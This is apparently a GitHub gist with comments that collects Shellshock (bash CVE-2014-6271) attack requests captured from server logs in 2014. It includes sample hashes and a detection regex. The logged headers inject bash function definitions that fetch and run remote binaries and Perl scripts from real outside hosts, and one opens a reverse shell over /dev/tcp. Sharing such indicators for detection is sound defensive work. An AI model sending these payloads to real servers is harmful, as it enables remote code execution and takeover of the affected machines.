-
-
Save anonymous/929d622f3b36b00c0be1 to your computer and use it in GitHub Desktop.
GET./.HTTP/1.0 | |
.User-Agent:.Thanks-Rob | |
.Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh; | |
.Host:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh; | |
.Referer:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh; | |
.Accept:.*/* | |
$ file nginx | |
nginx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.18, stripped | |
$ md5sum nginx | |
5924bcc045bb7039f55c6ce29234e29a nginx | |
$ sha256sum nginx | |
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx | |
Looking at string variables, it appears to be a kernel exploit with a CnC component. | |
- found by @yinettesys |
@Cherrytreee do you have cgi scripts? If not then you're safe atm.
@ChrisMCMine I don't. Thx!
More in the wild, though it looks like one of those "Is your site affected?" website scanners like shellshocker.net (if not for the remote file fetching). In this case, I wonder if it's necessarily a good idea for people to be creating "Check your website" online testers since it provides a proxy option for people with more malicious intent.
IP Address: 74.201.85.67
Location: Atlanta, GA 30303
http://target.tld:80/cgi-bin/test.sh
http://target.tld:80/cgi-bin/info.sh
http://target.tld:80/cgi-bin/test.sh
http://target.tld:80/cgi-bin/php.fcgi
http://target.tld:80/cgi-bin/php
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
Timestamp: 9/26/2014 8:39:45 AM
@UAHR
[25/Sep/2014:11:10:43 +0100] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 403 296 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
snap!
I created a regex that matches the different attacks. (egrep compatible v4)
()\s{.;\s}\s*;
Examples:
http://rubular.com/r/FRoObXn9Kx
just discovered a new one in our server logs..
X.X.X.X - - [27/Sep/2014:06:18:02 +0200] "GET /de HTTP/1.0" 200 36399 "-" "() { :;}; /bin/bash -c \x22wget -q -O /dev/null http://ad.dipad.biz/test/http://customer-domain-censored.com/\x22""
"() { :;}; /bin/bash -c "wget --delete-after http://remika.ru/userfiles/file/test.php\"
艹
Found this: "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'"
and another one bites the dust..
62.210.75.170 - - [30/Sep/2014:00:13:28 +0200] "GET /de/cgi-mod/index.cgi HTTP/1.1" 404 315 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y2Vuc29yZWQtZG9tYWluLmNvbVNoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y2Vuc29yZWQtZG9tYWluLmNvbVNoZWxsU2hvY2tTYWx0 >> /dev/null'"
Great,
86.34.164.238 - - [28/Sep/2014:13:01:55 +0800] "GET / HTTP/1.0" 200 364 "-" "() { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh""
Seems fairly straight-forward.
omg
A n00b question here:
If the logs show up as 404'd does it mean the UserAgent env were not actually evaluated - i.e. exploit failed ?